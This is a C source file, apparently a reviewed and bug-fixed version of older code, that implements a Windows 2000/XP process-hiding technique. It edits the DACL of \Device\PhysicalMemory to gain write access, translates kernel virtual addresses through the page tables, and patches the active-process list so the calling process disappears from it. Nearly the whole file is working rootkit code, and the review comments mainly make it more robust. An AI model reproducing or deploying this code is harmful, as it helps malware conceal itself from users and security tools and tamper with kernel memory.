- #include <windows.h>
- #include <Accctrl.h>
- #include <Aclapi.h>
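// Hand-rolled subset of the native (ntdll) definitions this file needs; it
// deliberately avoids <winternl.h>/<ntdef.h>. Only ZwOpenSection and
// RtlInitUnicodeString are resolved at runtime (see InitNTDLL()).
//
// NOTE(review): the whole listing is 32-bit x86 only. Pointers are carried
// in ULONGs and LinearToPhys() walks the 2-level, non-PAE page tables, so a
// 64-bit build would silently truncate addresses. Refuse to build instead.
#if defined(_WIN64)
#error "32-bit x86 only: pointers are stored in ULONG and the page-table walk assumes non-PAE 32-bit paging"
#endif

#define NT_SUCCESS(Status) ((NTSTATUS) (Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS) 0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
    NTSTATUS Status;
    ULONG Information;   // ULONG_PTR in the real header; ULONG is fine for a 32-bit-only build
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

// Counted UTF-16 string as used by the native API (Length/MaximumLength in bytes).
typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// OBJECT_ATTRIBUTES.Attributes flags. Kept for completeness; OpenPhysicalMemory()
// passes Attributes = 0.
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

// ntdll exports are stdcall; CALLBACK expands to that on x86.
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(OUT PHANDLE SectionHandle,
                                           IN ACCESS_MASK DesiredAccess,
                                           IN POBJECT_ATTRIBUTES ObjectAttributes);
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(IN OUT PUNICODE_STRING DestinationString,
                                              IN PCWSTR SourceString);

// Resolved by InitNTDLL(); NULL until then and again after CloseNTDLL().
RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
ZWOPENSECTION ZwOpenSection = NULL;

HMODULE g_hNtDLL = NULL;             // ntdll.dll module handle from LoadLibrary
PVOID g_pMapPhysicalMemory = NULL;   // 4 KiB view of the kernel page directory (see OpenPhysicalMemory)
HANDLE g_hMPM = NULL;                // section handle for \Device\PhysicalMemory
OSVERSIONINFO g_osvi;                // filled by OpenPhysicalMemory(); dwMinorVersion selects struct offsets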
- //---------------------------------------------------------------------------
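// Load ntdll.dll and resolve the two exports OpenPhysicalMemory() calls.
//
// Returns TRUE only when the module loaded AND both RtlInitUnicodeString and
// ZwOpenSection were found. On any failure nothing is left loaded and the
// global pointers stay NULL. (The original returned TRUE even when
// GetProcAddress failed, so a missing export became a call through NULL.)
BOOL InitNTDLL()
{
    g_hNtDLL = LoadLibrary("ntdll.dll");
    if (NULL == g_hNtDLL)
        return FALSE;

    RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL,
                                                                "RtlInitUnicodeString");
    ZwOpenSection = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");

    if (NULL == RtlInitUnicodeString || NULL == ZwOpenSection)
    {
        // Leave no half-initialised state for CloseNTDLL() or the caller.
        RtlInitUnicodeString = NULL;
        ZwOpenSection = NULL;
        FreeLibrary(g_hNtDLL);
        g_hNtDLL = NULL;
        return FALSE;
    }
    return TRUE;
}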
- //---------------------------------------------------------------------------
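// Release the ntdll module obtained by InitNTDLL(). Safe to call when nothing
// was loaded. Also clears the resolved export pointers so they cannot be
// used after the module reference is dropped (the original left them dangling).
VOID CloseNTDLL()
{
    if (NULL != g_hNtDLL)
        FreeLibrary(g_hNtDLL);
    g_hNtDLL = NULL;
    RtlInitUnicodeString = NULL;
    ZwOpenSection = NULL;
}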
- //---------------------------------------------------------------------------
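// Add a SECTION_MAP_WRITE grant for the current user to the DACL of hSection
// (intended for \Device\PhysicalMemory, opened with READ_CONTROL | WRITE_DAC).
//
// hSection: section handle carrying at least READ_CONTROL and WRITE_DAC.
// No return value; failures are silent, as in the original. Unlike the
// original, a failed step now stops the function: it no longer falls through
// and calls SetEntriesInAcl/SetSecurityInfo with a NULL DACL (which would have
// replaced the object's entire DACL with the single new entry), and the buffers
// from GetSecurityInfo/SetEntriesInAcl are freed on the success path too.
//
// NOTE(review): rewriting the DACL of \Device\PhysicalMemory from user mode is
// a rare, high-signal event; where object-access auditing is enabled on that
// object it is the part of this technique most likely to be recorded.
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
    PACL pDacl = NULL;
    PACL pNewDacl = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    EXPLICIT_ACCESS ea;
    DWORD dwRes;

    // Fetch the existing DACL; pDacl points inside the pSD buffer we own.
    dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                            NULL, NULL, &pDacl, NULL, &pSD);
    if (ERROR_SUCCESS != dwRes)
        goto cleanup;

    RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
    ea.grfAccessPermissions = SECTION_MAP_WRITE;
    ea.grfAccessMode = GRANT_ACCESS;
    ea.grfInheritance = NO_INHERITANCE;
    ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
    ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
    // "CURRENT_USER" is the special trustee name SetEntriesInAcl resolves to
    // the calling process's user; no account lookup by name is involved.
    ea.Trustee.ptstrName = (LPTSTR)"CURRENT_USER";

    // Merge the new ACE with the existing DACL into a fresh LocalAlloc'd ACL.
    dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
    if (ERROR_SUCCESS != dwRes)
        goto cleanup;

    dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                            NULL, NULL, pNewDacl, NULL);

cleanup:
    // LocalFree ignores a NULL argument, so no guards are needed.
    LocalFree(pNewDacl);
    LocalFree(pSD);
}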
- //---------------------------------------------------------------------------
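// Open the \Device\PhysicalMemory section read/write and map the 4 KiB page
// that holds the kernel page directory into g_pMapPhysicalMemory.
//
// Returns the section handle (also stored in g_hMPM) on success, NULL on any
// failure; on failure g_hMPM and g_pMapPhysicalMemory are left NULL.
// Requires InitNTDLL() to have succeeded.
//
// Only Windows 2000 (5.0) and XP (5.1) are accepted. The physical address of
// the page directory is hard-coded per version (the values the original
// authors observed on default installs) and is NOT verified at runtime; if it
// is wrong, LinearToPhys() walks garbage. From Windows Server 2003 SP1 onward
// user-mode opens of this section are refused regardless of its DACL, so the
// version gate is also a functional limit of the technique.
HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;
    HANDLE hDaclHandle = NULL;

    // The original called through these without checking them.
    if (NULL == RtlInitUnicodeString || NULL == ZwOpenSection)
        return NULL;

    g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if (!GetVersionEx(&g_osvi))
        return NULL;
    if (5 != g_osvi.dwMajorVersion)
        return NULL;

    switch (g_osvi.dwMinorVersion)
    {
    case 0:                        // Windows 2000
        PhyDirectory = 0x30000;
        break;
    case 1:                        // Windows XP
        PhyDirectory = 0x39000;
        break;
    default:
        return NULL;
    }

    // NT object-manager paths use backslashes; the rendered listing showed
    // "//Device//PhysicalMemory", which the object manager does not accept.
    RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
    attributes.Length = sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory = NULL;
    attributes.ObjectName = &physmemString;
    attributes.Attributes = 0;
    attributes.SecurityDescriptor = NULL;
    attributes.SecurityQualityOfService = NULL;

    status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    if (STATUS_ACCESS_DENIED == status)
    {
        // Default DACL grants only read to non-admins: reopen for DACL editing,
        // add a write grant for ourselves, then retry the real open.
        status = ZwOpenSection(&hDaclHandle, READ_CONTROL | WRITE_DAC, &attributes);
        if (!NT_SUCCESS(status))
        {
            g_hMPM = NULL;
            return NULL;           // original edited the DACL through an invalid handle here
        }
        SetPhyscialMemorySectionCanBeWrited(hDaclHandle);
        CloseHandle(hDaclHandle);
        status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
    }
    if (!NT_SUCCESS(status))
    {
        g_hMPM = NULL;
        return NULL;
    }

    // View one page of physical memory at the page-directory address.
    g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0,
                                         PhyDirectory, 0x1000);
    if (NULL == g_pMapPhysicalMemory)
    {
        CloseHandle(g_hMPM);       // original leaked the section handle here
        g_hMPM = NULL;
        return NULL;
    }
    return g_hMPM;
}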
- //---------------------------------------------------------------------------
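// Translate a kernel virtual address to a physical address by walking the
// 32-bit, non-PAE two-level page tables through the physical-memory section.
//
// BaseAddress: mapped view of the page directory (1024 ULONG PDEs).
// addr:        virtual address to translate.
// Returns the physical address, or 0 when the PDE/PTE is not present or the
// page table could not be mapped. (0 is also a legitimate physical address;
// callers treat it as "unmapped", which is fine for kernel VAs.)
//
// Bit layout used below: VA[31:22] = PDE index, VA[21:12] = PTE index,
// VA[11:0] = page offset; bit 0 of a PDE/PTE = present, bit 7 of a PDE = PS
// (4 MiB page, no second level).
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr = (ULONG)addr;
    ULONG PAddr;

    ULONG PGDE = BaseAddress[VAddr >> 22];
    if (0 == (PGDE & 1))
        return 0;                              // directory entry not present

    if (0 != (PGDE & 0x00000080))
    {
        // Large (4 MiB) page: the PDE holds the frame base directly.
        PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
    }
    else
    {
        // Map the 4 KiB page table the PDE points at and read the PTE.
        PULONG pageTable = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0,
                                                 PGDE & 0xFFFFF000, 0x1000);
        if (NULL == pageTable)
            return 0;                          // original dereferenced NULL here
        ULONG PTE = pageTable[(VAddr & 0x003FF000) >> 12];
        UnmapViewOfFile(pageTable);            // original leaked the view when PTE was absent
        if (0 == (PTE & 1))
            return 0;                          // page not present
        PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);
    }
    return (PVOID)PAddr;
}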
- //---------------------------------------------------------------------------
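// Read one 32-bit word at kernel virtual address addr via physical memory.
//
// Returns the word, or 0 when the address does not translate or the page
// cannot be mapped. The original ignored a 0 from LinearToPhys() and went on
// to map physical page 0, returning whatever lay there; the caller therefore
// must treat 0 as "unreadable", not as data.
ULONG GetData(PVOID addr)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (0 == phys)
        return 0;

    // Read-only view is sufficient here; the original asked for write as well.
    PULONG page = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0,
                                        phys & 0xFFFFF000, 0x1000);
    if (NULL == page)
        return 0;

    ULONG value = page[(phys & 0xFFF) >> 2];
    UnmapViewOfFile(page);
    return value;
}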
- //---------------------------------------------------------------------------
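// Write one 32-bit word to kernel virtual address addr via physical memory.
//
// Returns TRUE when the word was written, FALSE when the address does not
// translate or the page cannot be mapped. The original did not check the
// translation result and would have written into physical page 0 for an
// unmapped address.
BOOL SetData(PVOID addr, ULONG data)
{
    ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
    if (0 == phys)
        return FALSE;

    PULONG page = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0,
                                        phys & 0xFFFFF000, 0x1000);
    if (NULL == page)
        return FALSE;

    page[(phys & 0xFFF) >> 2] = data;
    UnmapViewOfFile(page);
    return TRUE;
}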
- //---------------------------------------------------------------------------
// Unhandled-exception filter (its registration in YHideProcess() is commented
// out): a fault while poking physical memory terminates the process silently
// instead of raising the crash dialog. The return statement is never reached
// because ExitProcess() does not return; it only satisfies the signature.
long __stdcall exeception(struct _EXCEPTION_POINTERS *info)
{
    (void)info;
    ExitProcess(0);
    return 1;
}
- //---------------------------------------------------------------------------
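// Unlink the current process from the kernel's active-process list by writing
// through \Device\PhysicalMemory (the Windows 2000/XP "/dev/kmem" technique).
//
// Returns TRUE when both list pointers were patched, FALSE otherwise. All
// resources (page-directory view, section handle, ntdll reference) are
// released on every path; the original leaked them on early returns.
//
// The listing as rendered contained a second, truncated copy of this function
// immediately before the complete one; this is the single deduplicated version.
//
// Offsets are taken from the original and are specific to the builds it
// targeted; nothing validates them:
//   0xFFDFF124          the original's comment calls this the current "kteb"
//   thread + 0x44       the original's comment calls this the owning "kpeb"
//   process + 0xa0/0xa4 (2000) and + 0x88/0x8c (XP): Flink/Blink of the
//                       process's entry in the active-process list
//
// NOTE(review): only the neighbours' pointers are rewritten; the hidden
// entry's own Flink/Blink still point at them. Whatever later unlinks this
// entry (e.g. at process exit) writes through those stale pointers, which is
// the known instability of this approach.
BOOL YHideProcess()
{
    BOOL ok = FALSE;
    BOOL patchedNext, patchedPrev;
    ULONG thread, process;
    ULONG fw = 0, bw = 0;

    // SetUnhandledExceptionFilter(exeception);
    if (FALSE == InitNTDLL())
        return FALSE;
    if (NULL == OpenPhysicalMemory())
        goto cleanup;

    thread = GetData((PVOID)0xFFDFF124);         // kteb (original comment)
    if (0 == thread)
        goto cleanup;
    process = GetData(PVOID(thread + 0x44));     // kpeb (original comment)
    if (0 == process)
        goto cleanup;

    // g_osvi was filled by OpenPhysicalMemory(), which only admits 5.0 / 5.1.
    switch (g_osvi.dwMinorVersion)
    {
    case 0:                                      // Windows 2000
        fw = GetData(PVOID(process + 0xa0));
        bw = GetData(PVOID(process + 0xa4));
        break;
    case 1:                                      // Windows XP
        fw = GetData(PVOID(process + 0x88));
        bw = GetData(PVOID(process + 0x8c));
        break;
    default:
        goto cleanup;                            // original left fw/bw uninitialised here
    }
    if (0 == fw || 0 == bw)
        goto cleanup;                            // unreadable links: do not scribble

    // next->Blink = prev; prev->Flink = next. Both writes are attempted, as in
    // the original, so a failure of the second does not leave the first undone
    // silently; the result reports whether the list is consistently patched.
    patchedNext = SetData(PVOID(fw + 4), bw);
    patchedPrev = SetData(PVOID(bw), fw);
    ok = patchedNext && patchedPrev;

cleanup:
    if (NULL != g_pMapPhysicalMemory)
    {
        UnmapViewOfFile(g_pMapPhysicalMemory);   // original never unmapped this view
        g_pMapPhysicalMemory = NULL;
    }
    if (NULL != g_hMPM)
    {
        CloseHandle(g_hMPM);
        g_hMPM = NULL;
    }
    CloseNTDLL();
    return ok;
}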
// Public entry point: run YHideProcess() at most once per process lifetime.
// Always returns TRUE, regardless of whether the unlink succeeded (the
// original discarded YHideProcess()'s result; that is preserved here).
BOOL HideProcess()
{
    static BOOL alreadyRun = FALSE;

    if (alreadyRun)
        return TRUE;

    alreadyRun = TRUE;                 // set before the attempt, so a failure is not retried
    (void)YHideProcess();
    return TRUE;
}